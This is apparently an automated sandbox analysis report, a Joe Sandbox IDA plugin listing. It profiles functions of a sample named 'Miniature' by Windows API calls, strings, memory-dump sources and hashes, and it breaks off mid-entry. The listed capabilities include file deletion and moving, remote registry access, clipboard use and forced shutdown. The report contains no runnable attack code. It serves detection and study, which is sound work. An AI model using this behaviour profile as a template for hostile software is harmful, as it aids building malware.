                                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 59484f16ef5e044cc48560e828815b56736780e417c86b3e6e924f0aff5cd8f2
                                                                                                                                                                                                                                                                                            • Instruction ID: e7e02b117245cffcdffa0a28c8978b2e57d02394016646f94b03561baa609ec3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59484f16ef5e044cc48560e828815b56736780e417c86b3e6e924f0aff5cd8f2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C661B135204201AFD300FF20D895FAAB7A4EF86718F14456DF497876A2DB31EE46DB62
                                                                                                                                                                                                                                                                                            Function 00C873D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C87403
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C87457
                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C87493
                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C874BA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C874F7
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C87524
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                            • Opcode ID: 468235a9060db46edf96b7f09b540efcf2bc6e88bb385f9068a57e1446b5b004
                                                                                                                                                                                                                                                                                            • Instruction ID: e87c9304bd204c3a19edfd443d5a64c05f2a1d3248952382c141886f2da63393
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 468235a9060db46edf96b7f09b540efcf2bc6e88bb385f9068a57e1446b5b004
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAD15F72508344AFC310EB64C885EAFB7ECAF89704F44492DF585D6291EB74DA48EB62
                                                                                                                                                                                                                                                                                            Function 00C8A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C8A0A8
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C8A0E6
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C8A100
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C8A118
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A123
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C8A13F
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C8A18F
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CD7B94), ref: 00C8A1AD
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8A1B7
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A1C4
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A1D4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: ef35d2251f2f6554d6145ab48c454d7444faf78b9cd3423fa5dcc22b96ef9bb3
                                                                                                                                                                                                                                                                                            • Instruction ID: dbcd4ef050796911618a62967473146ff8a1260339a12e55b9fbab5baff2065d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef35d2251f2f6554d6145ab48c454d7444faf78b9cd3423fa5dcc22b96ef9bb3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3131B532501219BBEF10ABB4DC4DBDE77ACAF05328F100166E926E3190EB74DE45CB69
                                                                                                                                                                                                                                                                                            Function 00C84763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C84785
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C847B2
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C847E2
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C84803
                                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00C84813
                                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C8489A
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C848A5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C848B0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                            • Opcode ID: 75a582bc5358bad8fe31e174afb78363c9301c4ec9bbf1a766f8ee7973a75b43
                                                                                                                                                                                                                                                                                            • Instruction ID: 13a4730fa8c2ddfd976ff554844a7e570505e8e5bc16fa00b03cd34804b80bff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75a582bc5358bad8fe31e174afb78363c9301c4ec9bbf1a766f8ee7973a75b43
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B31907150025AAADB21ABA0DC49FEF37BCEF89759F1041B6F61AD20A0E7709744CB24
                                                                                                                                                                                                                                                                                            Function 00C8A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C8A203
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C8A25E
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A269
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C8A285
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C8A2D5
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CD7B94), ref: 00C8A2F3
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8A2FD
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A30A
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A31A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C7E3B4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: c5569f1a84477bccbf117c015b97c4d67684b37ffaa9a29545cd9f0c1f61a12f
                                                                                                                                                                                                                                                                                            • Instruction ID: e06b11c96d1700ba9e58cd1282c491be7bd02b1af2e27c7606379fa32b901b1e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5569f1a84477bccbf117c015b97c4d67684b37ffaa9a29545cd9f0c1f61a12f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731E5715006196BEF20BFA5DC09BDE77AC9F45328F104163E826A31A0EB71DF45CB59
                                                                                                                                                                                                                                                                                            Function 00C9C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C99E
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C9CA09
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9CA2D
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9CA8C
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C9CB47
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C9CBB4
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C9CC49
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9CC9A
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C9CD43
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9CDE2
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9CDEF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e1efc8a8fbf0a2e1d9e6172d11e437db3e01a592f00bdaa09a4ed1702c2d1192
                                                                                                                                                                                                                                                                                            • Instruction ID: 10adec99a4ce7a37a87ec972e2734f452f07a74a4aabc1e0b0fc943a2a2cc763
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1efc8a8fbf0a2e1d9e6172d11e437db3e01a592f00bdaa09a4ed1702c2d1192
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF024071604200AFDB14DF28C8D5E2ABBE5EF49314F18849DF85ACB2A2DB31ED46DB51
                                                                                                                                                                                                                                                                                            Function 00C7D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7EAB0: GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7D9CD
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C7DA88
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7DA9B
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7DAB8
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7DAE2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C7DAC7,?,?), ref: 00C7DB5D
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00C7DAFE
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7DB0F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: 7dd2022c829c9ea8ae4c6beb12daf8b794db659b13e5dcad09b10274b3c3ff76
                                                                                                                                                                                                                                                                                            • Instruction ID: 9f3bdef2729e75c163799bcc764151889159aafb8a77651e6200d60200b5bd74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dd2022c829c9ea8ae4c6beb12daf8b794db659b13e5dcad09b10274b3c3ff76
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29616A3180510DAFCF05EBE0DA92AEDB7B5AF16304F2081A5E40A77195EB315F4AEF60
                                                                                                                                                                                                                                                                                            Function 00C8F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ba1391b14f08eeb79067ea66d8d0d56a7ffe1cd11cce107c3871f55c1a833332
                                                                                                                                                                                                                                                                                            • Instruction ID: fdba151f60ac022939a7bea427a062166565b30f6975cf5400737aac4d5b3a07
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba1391b14f08eeb79067ea66d8d0d56a7ffe1cd11cce107c3871f55c1a833332
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17418D31604611AFE314DF15D888B597BE4EF4631CF14C4ADE86A8FAA2CB35ED42CB94
                                                                                                                                                                                                                                                                                            Function 00C7F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7205A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C72087
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: GetLastError.KERNEL32 ref: 00C72097
                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C7F249
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                            • Opcode ID: 628a87d0d54f3523e30b75972e806779fef03c0bf5e3f23df42a0994ba66aedf
                                                                                                                                                                                                                                                                                            • Instruction ID: fadd8dbec6a445de60e367815c176f3277ddb7c7008185181ff6bad7f324691d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 628a87d0d54f3523e30b75972e806779fef03c0bf5e3f23df42a0994ba66aedf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01D67A7102146BEB1862B99CCABBE726C9F09394F158535FD17E31D3D5604E02A2A0
                                                                                                                                                                                                                                                                                            Function 00C4BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4BD54
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4BD78
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4BEFF
                                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CB46D0), ref: 00C4BF11
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C4BF89
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE2270,000000FF,?,0000003F,00000000,?), ref: 00C4BFB6
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4C0CB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 83e79aa6765bfe30f1d2b983881efa9ba54f7617353b80d49d4d8c1174a6dd66
                                                                                                                                                                                                                                                                                            • Instruction ID: 0059559f07f0116624302ab480596fd0220ca654c5d27677a822e7726396040a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83e79aa6765bfe30f1d2b983881efa9ba54f7617353b80d49d4d8c1174a6dd66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DBC13731D00249AFDB249F79CC41BAEBBB8FF81320F1441AAE5A59B251E730DE42DB50
                                                                                                                                                                                                                                                                                            Function 00C83A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C556C2,?,?,00000000,00000000), ref: 00C83A1E
                                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C556C2,?,?,00000000,00000000), ref: 00C83A35
                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00C556C2,?,?,00000000,00000000,?,?,?,?,?,?,00C166CE), ref: 00C83A45
